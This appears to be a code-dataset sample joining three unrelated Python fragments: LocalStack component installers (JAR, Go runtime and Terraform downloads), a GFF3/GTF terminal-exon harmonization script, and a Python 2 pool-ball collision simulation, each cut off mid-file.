        # move the JARs into the install dir and drop the copied folder
        path = Path(f"{INSTALL_DIR_INFRA}/stepfunctionslocal/")
        for file in path.glob("*.jar"):
            file.rename(Path(INSTALL_DIR_STEPFUNCTIONS) / file.name)
        rm_rf("%s/stepfunctionslocal" % INSTALL_DIR_INFRA)
    # apply patches
    for patch_class, patch_url in (
        (SFN_PATCH_CLASS1, SFN_PATCH_CLASS_URL1),
        (SFN_PATCH_CLASS2, SFN_PATCH_CLASS_URL2),
    ):
        patch_class_file = os.path.join(INSTALL_DIR_STEPFUNCTIONS, patch_class)
        if not os.path.exists(patch_class_file):
            download(patch_url, patch_class_file)
            # overwrite the class inside the JAR with the patched version
            cmd = 'cd "%s"; zip %s %s' % (
                INSTALL_DIR_STEPFUNCTIONS,
                INSTALL_PATH_STEPFUNCTIONS_JAR,
                patch_class,
            )
            run(cmd)
def install_dynamodb_local():
    """Download DynamoDBLocal if missing and quiet down its log4j2 configuration."""
    if not os.path.exists(INSTALL_PATH_DDB_JAR):
        log_install_msg("DynamoDB")
        # download and extract archive
        tmp_archive = os.path.join(tempfile.gettempdir(), "localstack.ddb.zip")
        download_and_extract_with_retry(DYNAMODB_JAR_URL, tmp_archive, INSTALL_DIR_DDB)
    # fix logging configuration for DynamoDBLocal
    log4j2_config = """<Configuration status="WARN">
      <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
          <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
        </Console>
      </Appenders>
      <Loggers>
        <Root level="WARN"><AppenderRef ref="Console"/></Root>
      </Loggers>
    </Configuration>"""
    log4j2_file = os.path.join(INSTALL_DIR_DDB, "log4j2.xml")
    save_file(log4j2_file, log4j2_config)
    # inject the config into the JAR; "|| true" keeps this best-effort
    run('cd "%s" && zip -u DynamoDBLocal.jar log4j2.xml || true' % INSTALL_DIR_DDB)
def install_amazon_kinesis_client_libs():
    """Download the STS JAR for the KCL and compile the bundled Java helpers."""
    # install KCL/STS JAR files
    if not os.path.exists(INSTALL_PATH_KCL_JAR):
        mkdir(INSTALL_DIR_KCL)
        tmp_archive = os.path.join(tempfile.gettempdir(), "aws-java-sdk-sts.jar")
        if not os.path.exists(tmp_archive):
            download(STS_JAR_URL, tmp_archive)
        shutil.copy(tmp_archive, INSTALL_DIR_KCL)
    # Compile Java files
    from localstack.utils.kinesis import kclipy_helper
    classpath = kclipy_helper.get_kcl_classpath()
    if is_windows():
        # Windows uses ";" as the classpath separator instead of ":"
        classpath = re.sub(r":([^\\])", r";\1", classpath)
    java_files = "%s/utils/kinesis/java/cloud/localstack/*.java" % MODULE_MAIN_PATH
    class_files = "%s/utils/kinesis/java/cloud/localstack/*.class" % MODULE_MAIN_PATH
    # only compile if no .class files exist yet
    if not glob.glob(class_files):
        run(
            'javac -source %s -target %s -cp "%s" %s'
            % (JAVAC_TARGET_VERSION, JAVAC_TARGET_VERSION, classpath, java_files)
        )
def install_lambda_java_libs():
    """Download the LocalStack "fat" JAR (bundles all Java dependencies) if missing."""
    if os.path.exists(INSTALL_PATH_LOCALSTACK_FAT_JAR):
        return
    log_install_msg("LocalStack Java libraries", verbatim=True)
    download(URL_LOCALSTACK_FAT_JAR, INSTALL_PATH_LOCALSTACK_FAT_JAR)
def install_go_lambda_runtime():
    """Download and install the Go Lambda runtime (runtime binary + mock server).

    Only Linux on amd64/arm32 is supported by the upstream release artifacts.

    Raises:
        ValueError: if the current OS or CPU architecture is unsupported.
    """
    if os.path.isfile(GO_LAMBDA_RUNTIME):
        return
    log_install_msg("Installing golang runtime")
    system = platform.system().lower()
    arch = get_arch()
    if system not in ["linux"]:
        raise ValueError("unsupported os %s for awslambda-go-runtime" % system)
    if arch not in ["amd64", "arm32"]:
        raise ValueError("unsupported arch %s for awslambda-go-runtime" % arch)
    url = GO_RUNTIME_DOWNLOAD_URL_TEMPLATE.format(
        version=GO_RUNTIME_VERSION,
        os=system,
        arch=arch,
    )
    download_and_extract(url, GO_INSTALL_FOLDER)
    # the extracted files may not carry executable bits -> fix permissions
    for binary in (GO_LAMBDA_RUNTIME, GO_LAMBDA_MOCKSERVER):
        _make_executable(binary)


def _make_executable(path):
    """Add the user/group/other executable bits to the file at *path*."""
    st = os.stat(path)
    os.chmod(path, st.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
def install_cloudformation_libs():
    """Trigger the one-time download of the CloudFormation response module file."""
    from localstack.services.cloudformation.deployment_utils import get_cfn_response_mod_file
    get_cfn_response_mod_file()
def install_terraform() -> str:
    """Download and unpack the pinned Terraform release; return the binary path."""
    if not os.path.isfile(TERRAFORM_BIN):
        log_install_msg(f"Installing terraform {TERRAFORM_VERSION}")
        download_url = TERRAFORM_URL_TEMPLATE.format(
            version=TERRAFORM_VERSION,
            os=platform.system().lower(),
            arch=get_arch(),
        )
        download_and_extract(download_url, os.path.dirname(TERRAFORM_BIN))
        chmod_r(TERRAFORM_BIN, 0o777)
    return TERRAFORM_BIN
def get_terraform_binary() -> str:
    """Return the Terraform binary path, installing Terraform on first use."""
    if os.path.isfile(TERRAFORM_BIN):
        return TERRAFORM_BIN
    # install_terraform() returns TERRAFORM_BIN after installing
    return install_terraform()
def install_component(name):
    """Run the installer registered for *name*; unknown names are a no-op."""
    installer = {
        "cloudformation": install_cloudformation_libs,
        "dynamodb": install_dynamodb_local,
        "kinesis": install_kinesis,
        "kms": install_local_kms,
        "sqs": install_elasticmq,
        "stepfunctions": install_stepfunctions_local,
    }.get(name)
    if installer is not None:
        installer()
def install_components(names):
    """Install the given component names in parallel, then the Lambda Java libs."""
    parallelize(install_component, names)
    install_lambda_java_libs()
def install_all_components():
    """Load plugins, then install every component in DEFAULT_SERVICE_PORTS."""
    # load plugins
    os.environ[LOCALSTACK_INFRA_PROCESS] = "1"
    bootstrap.load_plugins()
    # install all components
    install_components(DEFAULT_SERVICE_PORTS.keys())
def install_debugpy_and_dependencies():
    """Ensure the debugpy module is importable, installing it via pip if missing."""
    try:
        import debugpy
        assert debugpy  # silence "unused import" - the import itself is the probe
        logging.debug("Debugpy module already Installed")
    except ModuleNotFoundError:
        logging.debug("Installing Debugpy module")
        import subprocess
        # Invoke pip through "python -m pip" instead of pip.main()/pip._internal.main():
        # pip's in-process API is unsupported and breaks across pip releases.
        subprocess.check_call([sys.executable, "-m", "pip", "install", DEBUGPY_MODULE])
# -----------------
# HELPER FUNCTIONS
# -----------------
def log_install_msg(component, verbatim=False):
    """Log the standard "downloading and installing" message for a component.

    Args:
        component: name of the component being installed.
        verbatim: if False, the name is wrapped as "local <component> server".
    """
    component = component if verbatim else "local %s server" % component
    # lazy %-style args: the message is only formatted if INFO logging is enabled
    LOG.info("Downloading and installing %s. This may take some time.", component)
def download_and_extract(archive_url, target_dir, retries=0, sleep=3, tmp_archive=None):
mkdir(target_dir)
if tmp_archive:
_, ext = os.path.splitext(tmp_archive)
else:
_, | |
<reponame>agladstein/RNA-Seq-in-the-Cloud
#!/usr/bin/env python
import csv
import gzip
import re
import sys
import os
from collections import defaultdict, OrderedDict
import argparse
# See http://stackoverflow.com/questions/14207708/ioerror-errno-32-broken-pipe-python
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
# Command-line interface: input/output files are mandatory, format defaults to gtf.
parser = argparse.ArgumentParser(description ="""This script parses input
gff/gtf file and harmonizes the equivalent terminal exons
for each gene """)
parser.add_argument('-i', '--infile', help="input file; required")
parser.add_argument('-o', '--outfile', help="output file; required")
parser.add_argument('-f', '--format', help="input file format `gff3` or `gtf`; \
default is gtf")
parser.add_argument('--fancy_refseq_stuff', help="do fancy refseq stuff to \
extend only up to the longest known RefSeq on the 5' end and to the \
longest 'any' RefSeq on the 3' end", action = 'store_true')
parser.add_argument('-z', '--gzip', help="input and ouput files are gzip \
compressed", action = 'store_true')
args = parser.parse_args()
# both --infile and --outfile must be given, otherwise exit
if not all([args.infile, args.outfile]):
    print("You must provide input and output files", file = sys.stderr)
    sys.exit()
else:
    input_file = args.infile
    output_file = args.outfile
# validate the (optional) input format; default is gtf
if args.format:
    input_format = args.format
    if not input_format in ['gff3', 'gtf']:
        print("Input file format can only be `gff3` or `gtf`", file = sys.stderr)
        sys.exit()
else:
    input_format = 'gtf'
# normalize the store_true flag into a plain module-level boolean
if args.fancy_refseq_stuff:
    fancy_refseq_stuff = True
else:
    fancy_refseq_stuff = False
def get_gff3_exons(input_file):
    """Collect the first and last exon of each transcript from a gff3 file.

    Returns a 3-tuple:
      first_exons_dict: {(chrom, strand, gene_id): {tx: [start, stop]}} for 5' exons
      last_exons_dict:  same structure for 3' exons
      parent_id_dict:   {Parent attribute: (chrom, strand, gene_id, tx)}
    Reads gzip-compressed input when the --gzip flag was given.
    """
    if args.gzip:
        f = gzip.open(input_file, 'rt')
    else:
        f = open(input_file, 'rt')
    def process_attribs(attribs):
        # parse "k=v;k=v" gff3 attributes; Dbxref entries ("db:id,...") are
        # flattened so that each db name maps to its id
        new_attribs = {}
        attribs = list(filter(None, attribs.split(';')))
        for attrib in attribs:
            k, v = attrib.split('=')
            if k == 'Dbxref':
                xrefs = v.split(',')
                for xref in xrefs:
                    terms = xref.split(':')
                    new_attribs[terms[-2]] = terms[-1]
            else:
                new_attribs[k] = v
        return new_attribs
    tbl = csv.reader(f, delimiter = '\t')
    parent_id_dict = {}
    first_exons_dict = {}
    last_exons_dict = {}
    for line in tbl:
        if not line[0].startswith('#'):
            [
                chrom, feat_source, feat_type,
                start, stop, score,
                strand, phase, attribs
            ] = line
            start, stop = int(start), int(stop)
            # only keep well-formed exon features
            if feat_type == 'exon' and stop > start:
                new_attribs = process_attribs(attribs)
                gene_id = new_attribs['GeneID']
                if 'transcript_id' in attribs:
                    tx = new_attribs['transcript_id']
                else:
                    tx = new_attribs['Parent']
                gene_info = (chrom, strand, gene_id)
                parent_id_dict[new_attribs['Parent']] = (
                    chrom, strand, gene_id, tx)
                if gene_info not in first_exons_dict:
                    # first exon seen for this gene at all
                    first_exons_dict[gene_info] = {tx : [start, stop]}
                    last_exons_dict[gene_info] = {tx : [start, stop]}
                elif tx not in first_exons_dict[gene_info]:
                    # first exon seen for this transcript
                    first_exons_dict[gene_info][tx] = [start, stop]
                    last_exons_dict[gene_info][tx] = [start, stop]
                elif strand == '+':
                    # '+' strand: smallest start = first exon, largest start = last exon
                    if start < first_exons_dict[gene_info][tx][0]:
                        first_exons_dict[gene_info][tx] = [start, stop]
                    if start > last_exons_dict[gene_info][tx][0]:
                        last_exons_dict[gene_info][tx] = [start, stop]
                elif strand == '-':
                    # '-' strand: largest start = first exon, smallest start = last exon
                    if start > first_exons_dict[gene_info][tx][0]:
                        first_exons_dict[gene_info][tx] = [start, stop]
                    if start < last_exons_dict[gene_info][tx][0]:
                        last_exons_dict[gene_info][tx] = [start, stop]
    f.close()
    return first_exons_dict, last_exons_dict, parent_id_dict
def get_gtf_exons(input_file):
    """Collect the first and last exon of each transcript from a gtf file.

    Returns (first_exons_dict, last_exons_dict), both keyed by
    (chrom, strand, gene_id) mapping {tx: [start, stop]}.
    Reads gzip-compressed input when the --gzip flag was given.
    process_attribs notes (mostly for my future self):
    1. there can be more attribs like db_xref that are present >1 time; this
    script ends up keeping only the one that appears in the end
    2. 'description' attrib will include only the first word
    3. used OrderedDict b/c list->set->list conversion may lose order and we
    will end up with GeneID:123 in one case and 123:GeneID in another
    """
    if args.gzip:
        f = gzip.open(input_file, 'rt')
    else:
        f = open(input_file, 'rt')
    def process_attribs(attribs):
        # parse gtf 'key "value"; ...' attributes into a plain dict
        new_attribs = {}
        attribs = filter(None, attribs.rstrip(' ').split(';'))
        for attrib in attribs:
            attrib = attrib.lstrip(' ').split(' ')
            if attrib[0] == 'db_xref':
                # de-duplicate "db:id" terms while preserving their order
                attrib = OrderedDict.fromkeys(attrib[1].strip('"').split(':'))
                attrib = list(attrib.keys())
            new_attribs[attrib[0]] = attrib[1].strip('"')
        return new_attribs
    tbl = csv.reader(f, delimiter = '\t')
    first_exons_dict = {}
    last_exons_dict = {}
    for line in tbl:
        if not line[0].startswith('#'):
            [
                chrom, feat_source, feat_type,
                start, stop, score,
                strand, phase, attribs
            ] = line
            start, stop = int(start), int(stop)
            # only keep well-formed exon features
            if feat_type == 'exon' and stop > start:
                new_attribs = process_attribs(attribs)
                # prefer the GeneID xref, fall back to the gene_id attribute
                gene_id = new_attribs.get('GeneID', new_attribs['gene_id'])
                tx = new_attribs['transcript_id']
                gene_info = (chrom, strand, gene_id)
                if gene_info not in first_exons_dict:
                    # first exon seen for this gene at all
                    first_exons_dict[gene_info] = {tx : [start, stop]}
                    last_exons_dict[gene_info] = {tx : [start, stop]}
                elif tx not in first_exons_dict[gene_info]:
                    # first exon seen for this transcript
                    first_exons_dict[gene_info][tx] = [start, stop]
                    last_exons_dict[gene_info][tx] = [start, stop]
                elif strand == '+':
                    # '+' strand: smallest start = first exon, largest start = last exon
                    if start < first_exons_dict[gene_info][tx][0]:
                        first_exons_dict[gene_info][tx] = [start, stop]
                    if start > last_exons_dict[gene_info][tx][0]:
                        last_exons_dict[gene_info][tx] = [start, stop]
                elif strand == '-':
                    # '-' strand: largest start = first exon, smallest start = last exon
                    if start > first_exons_dict[gene_info][tx][0]:
                        first_exons_dict[gene_info][tx] = [start, stop]
                    if start < last_exons_dict[gene_info][tx][0]:
                        last_exons_dict[gene_info][tx] = [start, stop]
    f.close()
    return first_exons_dict, last_exons_dict
def create_start_extensions_list(first_exons_dict, fancy_refseq_stuff):
    """Compute 5'-end harmonization for first exons that share a 3' boundary.

    For each gene, first exons with the same inner (3') coordinate are harmonized
    to the furthest 5' coordinate seen for that boundary.  With fancy_refseq_stuff,
    transcripts whose accession starts with 'N' (known RefSeq) can extend the
    boundary, while other accessions only register a boundary that is not yet known.
    Returns {(chrom, strand, gene_id, tx): [original_exon, extended_exon]} for
    transcripts whose first exon changes.
    """
    start_extensions = {}
    for gene_info, all_txs in first_exons_dict.items():
        chrom, strand, gene_id = gene_info
        # maps the shared inner boundary -> furthest 5' coordinate for that boundary
        longest_first_exons = {}
        if fancy_refseq_stuff:
            if strand == '+':
                # key on the exon stop; track the smallest start ('N' accessions may update)
                for tx, first_exon in sorted(all_txs.items()):
                    i = longest_first_exons.get(first_exon[1], None)
                    if tx.startswith('N'):
                        if i is None or first_exon[0] < i :
                            longest_first_exons[first_exon[1]] = first_exon[0]
                    elif first_exon[1] not in longest_first_exons:
                        if i is None or first_exon[0] < i :
                            longest_first_exons[first_exon[1]] = first_exon[0]
            elif strand == '-':
                # key on the exon start; track the largest stop ('N' accessions may update)
                for tx, first_exon in sorted(all_txs.items()):
                    i = longest_first_exons.get(first_exon[0], None)
                    if tx.startswith('N'):
                        if i is None or first_exon[1] > i:
                            longest_first_exons[first_exon[0]] = first_exon[1]
                    elif first_exon[0] not in longest_first_exons:
                        if i is None or first_exon[1] > i:
                            longest_first_exons[first_exon[0]] = first_exon[1]
        else:
            # simple mode: any transcript may set the boundary
            first_exons_set = set()
            for tx, first_exon in sorted(all_txs.items()):
                first_exons_set.add(tuple(first_exon))
            first_exons_set = sorted(list(first_exons_set))
            if strand == '+':
                # sorted ascending -> first occurrence keeps the smallest start per stop
                for first_exon in first_exons_set:
                    if first_exon[1] not in longest_first_exons:
                        longest_first_exons[first_exon[1]] = first_exon[0]
            elif strand == '-':
                # sorted ascending -> later (larger) stops overwrite per start
                for first_exon in first_exons_set:
                    longest_first_exons[first_exon[0]] = first_exon[1]
        # record an extension for every transcript not already at the harmonized boundary
        for tx, first_exon in all_txs.items():
            tx_info = (chrom, strand, gene_id, tx)
            if strand == '+':
                if longest_first_exons[first_exon[1]] == first_exon[0]:
                    continue
                else:
                    start_extensions[tx_info] = [
                        first_exon,
                        [longest_first_exons[first_exon[1]],
                        first_exon[1]]]
            elif strand == '-':
                if longest_first_exons[first_exon[0]] == first_exon[1]:
                    continue
                else:
                    start_extensions[tx_info] = [
                        first_exon,
                        [first_exon[0],
                        longest_first_exons[first_exon[0]]]]
    return start_extensions
def create_end_extensions_list(last_exons_dict):
    """Map each transcript to [current_last_exon, extended_last_exon].

    Per gene, the longest terminal exon among those sharing the same
    internal splice boundary (the start on '+' strands, the stop on '-')
    is chosen; every transcript whose last exon falls short of it gets an
    extension entry.

    Args:
        last_exons_dict: {(chrom, strand, gene_id): {tx: [start, stop]}}.

    Returns:
        {(chrom, strand, gene_id, tx): [[old_start, old_stop],
                                        [new_start, new_stop]]}
    """
    end_extensions = {}
    for gene_info, transcripts in last_exons_dict.items():
        chrom, strand, gene_id = gene_info
        # Deduplicate the terminal exons and scan them in sorted order.
        unique_exons = sorted({tuple(exon) for exon in transcripts.values()})
        longest = {}
        if strand == '+':
            # Keyed by exon start; later (larger) stops overwrite, so each
            # start maps to the furthest downstream stop.
            for exon_start, exon_stop in unique_exons:
                longest[exon_start] = exon_stop
        elif strand == '-':
            # Keyed by exon stop; only the first (smallest) start is kept.
            for exon_start, exon_stop in unique_exons:
                longest.setdefault(exon_stop, exon_start)
        for tx, last_exon in transcripts.items():
            tx_info = (chrom, strand, gene_id, tx)
            if strand == '+':
                if longest[last_exon[0]] != last_exon[1]:
                    end_extensions[tx_info] = [
                        last_exon,
                        [last_exon[0], longest[last_exon[0]]]]
            elif strand == '-':
                if longest[last_exon[1]] != last_exon[0]:
                    end_extensions[tx_info] = [
                        last_exon,
                        [longest[last_exon[1]], last_exon[1]]]
    return end_extensions
def write_updated_gff3_file(input_file, output_file, start_extensions,
                            end_extensions, parent_id_dict, use_gzip=None):
    """Copy a GFF3 file to output_file, applying exon start/end extensions.

    Exon rows whose coordinates equal the recorded "old" exon for their
    transcript are rewritten with the extended coordinates.  Other feature
    rows (genes, mRNAs, ...) are looked up through parent_id_dict and, when
    one of their boundaries matches the old exon boundary, that boundary is
    moved and a ``tag=extended_start`` / ``tag=extended_end`` attribute is
    appended.

    Args:
        input_file: path to the source GFF3 (optionally gzip-compressed).
        output_file: path the updated GFF3 is written to.
        start_extensions: {(chrom, strand, gene_id, tx): [old_exon, new_exon]}
            first-exon replacements, as built by create_start_extensions_list.
        end_extensions: same mapping for last exons.
        parent_id_dict: maps a GFF3 ``ID`` attribute to the transcript tuple
            used as key in the extension dicts.
        use_gzip: read/write gzip streams when true; defaults to the
            module-global ``args.gzip`` so existing callers are unaffected.

    NOTE(review): rows whose first field starts with '#' (headers/comments)
    are dropped, not copied through — preserved from the original behavior;
    confirm this is intended.
    """
    if use_gzip is None:
        use_gzip = args.gzip
    if use_gzip:
        fi = gzip.open(input_file, 'rt')
        fo = gzip.open(output_file, 'wt')
    else:
        fi = open(input_file, 'rt')
        # BUG FIX: this handle was previously opened in read mode ('rt'),
        # which made every writerow() call fail; open it for writing.
        fo = open(output_file, 'wt')

    def process_attribs(attribs):
        """Parse a GFF3 column-9 attribute string into a dict, flattening
        Dbxref entries (e.g. ``Dbxref=GeneID:123`` -> {'GeneID': '123'})."""
        new_attribs = {}
        split_attribs = list(filter(None, attribs.split(';')))
        for attrib in split_attribs:
            k, v = attrib.split('=')
            if k == 'Dbxref':
                xrefs = v.split(',')
                for xref in xrefs:
                    terms = xref.split(':')
                    # Only the last two fields of a multi-part xref are kept.
                    new_attribs[terms[-2]] = terms[-1]
            else:
                new_attribs[k] = v
        return new_attribs

    tblin = csv.reader(fi, delimiter='\t')
    tblout = csv.writer(fo, delimiter='\t', lineterminator=os.linesep)
    for line in tblin:
        if not line[0].startswith('#'):
            [chrom, feat_source, feat_type,
             start, stop, score,
             strand, phase, attribs] = line
            start, stop = int(start), int(stop)
            new_attribs = process_attribs(attribs)
            if feat_type == 'exon' and stop > start:
                gene_id = new_attribs['GeneID']
                # Substring test on the raw attribute string, preserved
                # from the original implementation.
                if 'transcript_id' in attribs:
                    tx = new_attribs['transcript_id']
                else:
                    tx = new_attribs['Parent']
                gene_info = (chrom, strand, gene_id, tx)
                if (gene_info in start_extensions
                        and start_extensions[gene_info][0] == [start, stop]):
                    line[3], line[4] = start_extensions[gene_info][1]
                elif (gene_info in end_extensions
                      and end_extensions[gene_info][0] == [start, stop]):
                    line[3], line[4] = end_extensions[gene_info][1]
            else:
                gff3_id = new_attribs.get('ID', 'No_ID_present')
                if (gff3_id in parent_id_dict
                        and parent_id_dict[gff3_id] in start_extensions):
                    gene_info = parent_id_dict[gff3_id]
                    if (strand == '+'
                            and start_extensions[gene_info][0][0] == start):
                        line[3] = start_extensions[gene_info][1][0]
                        line[8] = line[8].rstrip() + ';tag=extended_start'
                    elif (strand == '-'
                          and start_extensions[gene_info][0][1] == stop):
                        line[4] = start_extensions[gene_info][1][1]
                        line[8] = line[8].rstrip() + ';tag=extended_start'
                if (gff3_id in parent_id_dict
                        and parent_id_dict[gff3_id] in end_extensions):
                    gene_info = parent_id_dict[gff3_id]
                    if (strand == '+'
                            and end_extensions[gene_info][0][1] == stop):
                        line[4] = end_extensions[gene_info][1][1]
                        # Merge with an extended_start tag when present.
                        if line[8].endswith('extended_start'):
                            line[8] = line[8].rstrip() + ',extended_end'
                        else:
                            line[8] = line[8].rstrip() + ';tag=extended_end'
                    elif (strand == '-'
                          and end_extensions[gene_info][0][0] == start):
                        line[3] = end_extensions[gene_info][1][0]
                        if line[8].endswith('extended_start'):
                            line[8] = line[8].rstrip() + ',extended_end'
                        else:
                            line[8] = line[8].rstrip() + ';tag=extended_end'
            tblout.writerow(line)
    fi.close()
    fo.close()
def write_updated_gtf_file(input_file, output_file, start_extensions, end_extensions):
if args.gzip:
fi = gzip.open(input_file, 'rt')
fo = gzip.open(output_file, 'wt')
else:
fi = open(input_file, 'rt')
fo = open(output_file, 'wt')
def process_attribs(attribs):
new_attribs = {}
attribs = filter(None, attribs.rstrip(' ').split(';'))
for attrib in attribs:
attrib = attrib.lstrip(' ').split(' ')
if attrib[0] == 'db_xref':
attrib = OrderedDict.fromkeys(attrib[1].strip('"').split(':'))
attrib = list(attrib.keys())
new_attribs[attrib[0]] = attrib[1].strip('"')
return new_attribs
tblin = csv.reader(fi, delimiter = '\t')
tblout = csv.writer(fo,
delimiter = '\t',
lineterminator = os.linesep,
quotechar = '\xb6' )
| |
import math
from random import *
import numpy as np
import matplotlib
from matplotlib import pyplot as plt
from matplotlib import animation
def main():
    """Hard-sphere 'pool break' simulation.

    Fifteen randomly perturbed balls arranged in a triangle are struck by a
    cue ball; translate / detect-collisions / resolve steps are iterated and
    the recorded trajectories are animated with matplotlib.

    NOTE(review): this is Python 2 code (print statements; NN/div and i/div
    rely on integer division).
    """
    global m_ani
    ######################################################################
    '''
    The balls get sent to the translation matrix, which moves the balls slightly,
    and then sends them back to
    main. Then, the balls are sent to the collisions checker, which checks
    collisions, then sends the balls and the collisions which it detected to
    the resolver, which resolves the collisions and then returns the balls
    to the collision detector which returns the balls to the main. This
    process is iterated, as the conditions are currently set, 45000 times and
    10 trials of this are carried out.
    It is suggested you go make a sandwich or get a coffee if intending to
    iterate more than ~750,000 times total.
    '''
    ######################################################################
    '''
    R is the radius of the balls, a is the midway distance between the center of mass of two adjacent balls,
    (a-R)=f is the largest possible pertubation of a ball so that no balls superimpose
    '''
    R = 3.0
    a = 3.02
    f = a - R
    #this loops 10 times = 10 trials
    # NOTE(review): despite the comment above, this is an `if`, not a loop:
    # the body runs at most once and the trailing `y += 1` has no looping
    # effect. A `while y < 5:` (or 10) was probably intended — confirm
    # before changing.
    y = 0
    if y < 5:
        '''
        r_ij is a random number between 0 and 1. There are 15 values for i (representing each ball) and 2 values for j
        (the first representing the magnitude of a random pertubation and a second
        representing the direction of the random pertubation)
        '''
        r_11 = random()
        r_12 = random()
        r_21 = random()
        r_22 = random()
        r_31 = random()
        r_32 = random()
        r_41 = random()
        r_42 = random()
        r_51 = random()
        r_52 = random()
        r_61 = random()
        r_62 = random()
        r_71 = random()
        r_72 = random()
        r_81 = random()
        r_82 = random()
        r_91 = random()
        r_92 = random()
        r_101 = random()
        r_102 = random()
        r_111 = random()
        r_112 = random()
        r_121 = random()
        r_122 = random()
        r_131 = random()
        r_132 = random()
        r_141 = random()
        r_142 = random()
        r_151 = random()
        r_152 = random()
        r_v = random()
        r_v2 = random()
        '''
        Each b_i is a ball, whose state is defined by 5 elements
        [xposition, yposition, xvelocity, yvelocity, indentifying#]
        The first terms in the xposition and yposition orient the balls
        in an equilateral triangle. The orientation of this triangle is the
        same as the triangle that this 'less than' and 'such that' sign
        make: <|
        The second terms in the xpos and ypos represent the pertubation of
        each ball, which ensures that there is no overlap between the balls
        The ball farthest left (b1) is given an initial velocity into the
        other balls.
        '''
        b1 = [0.0, 0.0 + f*r_11*math.sin(2*math.pi*r_12), 500.0, 50.+r_v2*100., 0]
        b2 = [math.sqrt(3)*a + f*r_21*math.cos(2*math.pi*r_22), -a + f*r_21*math.sin(2*math.pi*r_22), 0.0, 0.0, 1]
        b3 = [math.sqrt(3)*a + f*r_31*math.cos(2*math.pi*r_32), a + f*r_31*math.sin(2*math.pi*r_32), 0.0, 0.0, 2]
        b4 = [math.sqrt(3)*2.0*a + f*r_41*math.cos(2*math.pi*r_42), -2.0*a + f*r_41*math.sin(2*math.pi*r_42), 0.0, 0.0, 3]
        b5 = [math.sqrt(3)*2.0*a + f*r_51*math.cos(2*math.pi*r_52), a*0.0 + f*r_51*math.sin(2*math.pi*r_52), 0.0, 0.0, 4]
        b6 = [math.sqrt(3)*2.0*a + f*r_61*math.cos(2*math.pi*r_62), 2.0*a + f*r_61*math.sin(2*math.pi*r_62), 0.0, 0.0, 5]
        b7 = [math.sqrt(3)*3.0*a + f*r_71*math.cos(2*math.pi*r_72), -3.0*a + f*r_71*math.sin(2*math.pi*r_72), 0.0, 0.0, 6]
        b8 = [math.sqrt(3)*3.0*a + f*r_81*math.cos(2*math.pi*r_82), -a + f*r_81*math.sin(2*math.pi*r_82), 0.0, 0.0, 7]
        b9 = [math.sqrt(3)*3.0*a + f*r_91*math.cos(2*math.pi*r_92), a + f*r_91*math.sin(2*math.pi*r_92), 0.0, 0.0, 8]
        b10 = [math.sqrt(3)*3.0*a + f*r_101*math.cos(2*math.pi*r_102), 3.0*a + f*r_101*math.sin(2*math.pi*r_102), 0.0, 0.0, 9]
        b11 = [math.sqrt(3)*4.0*a + f*r_111*math.cos(2*math.pi*r_112), -4.0*a + f*r_111*math.sin(2*math.pi*r_112), 0.0, 0.0, 10]
        b12 = [math.sqrt(3)*4.0*a + f*r_121*math.cos(2*math.pi*r_122), -2.0*a + f*r_121*math.sin(2*math.pi*r_122), 0.0, 0.0, 11]
        b13 = [math.sqrt(3)*4.0*a + f*r_131*math.cos(2*math.pi*r_132), 0.0*a + f*r_131*math.sin(2*math.pi*r_132), 0.0, 0.0, 12]
        b14 = [math.sqrt(3)*4.0*a + f*r_141*math.cos(2*math.pi*r_142), 2.0*a + f*r_141*math.sin(2*math.pi*r_142), 0.0, 0.0, 13]
        b15 = [math.sqrt(3)*4.0*a + f*r_151*math.cos(2*math.pi*r_152), 4.0*a + f*r_151*math.sin(2*math.pi*r_152), 0.0, 0.0, 14]
        '''
        m is the master list of all pool balls
        '''
        m = [b1, b2, b3, b4, b5, b6, b7, b8, b9, b10, b11, b12, b13, b14, b15]
        '''
        del_t is the time step
        if delta t is of order 0.00000001, higher precision number types are needed
        '''
        del_t = 0.00001
        print ""
        #this loop means 45000 iterations of translate, check for collisions,
        #and resolve collisions will be carried out
        i = 0
        NN = 500000
        div = 50
        # Snapshot buffer: one frame every `div` steps (NN/div is Python 2
        # integer division).
        m_ani = np.zeros((NN/div, 15, 5))
        for i in range(0,NN):
            '''
            uncomment if you want to see the 10th balls velocity every 5000 iterations
            '''
            m = translation(m, del_t)
            m = collision_detector(m, del_t)
            if i%div == 0:
                m_ani[i/div,:,:] = np.asarray(m)
            #m_ani[i,:,:] = np.asarray(m)
        '''
        fig = plt.figure()
        ax = fig.add_subplot(111)
        ax.set_xlim(-100,100)
        ax.set_ylim(-100,100)
        fig.set_dpi(100)
        particles, = ax.plot([], [], 'bo', ms=27)
        def init():
            particles.set_data([], [])
            return particles,
        def animate(i):
            global m_ani
            particles.set_data(m_ani[i,10,:], m_ani[i,10,:])
            particles.set_markersize(3.)
            return particles,
        anim = animation.FuncAnimation(fig, animate,
                                       init_func=init,
                                       frames=360,
                                       interval=20,
                                       blit=False)
        plt.show()
        '''
        '''
        print np.shape(m_ani)
        upto = 5000
        fig = plt.figure()
        ax = fig.add_subplot(111)
        ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
        ax.plot(m_ani[:upto,:,0],m_ani[:upto,:,1])
        ax.scatter(m_ani[upto,:,0],m_ani[upto,:,1],s=120)
        ax.set_xlim(-180,60)
        ax.set_ylim(-60,60)
        plt.show()
        fig = plt.figure()
        ax = fig.add_subplot(111)
        ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
        ax.plot(m_ani[:2*upto,:,0],m_ani[:2*upto,:,1])
        ax.scatter(m_ani[2*upto,:,0],m_ani[2*upto,:,1],s=120)
        ax.set_xlim(-180,60)
        ax.set_ylim(-60,60)
        plt.show()
        fig = plt.figure()
        ax = fig.add_subplot(111)
        ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
        ax.plot(m_ani[:3*upto,:,0],m_ani[:3*upto,:,1])
        ax.scatter(m_ani[3*upto,:,0],m_ani[3*upto,:,1],s=120)
        ax.set_xlim(-180,60)
        ax.set_ylim(-60,60)
        plt.show()
        fig = plt.figure()
        ax = fig.add_subplot(111)
        ax.scatter(m_ani[0,:,0],m_ani[0,:,1],s=120,alpha=0.4)
        ax.plot(m_ani[:4*upto,:,0],m_ani[:4*upto,:,1])
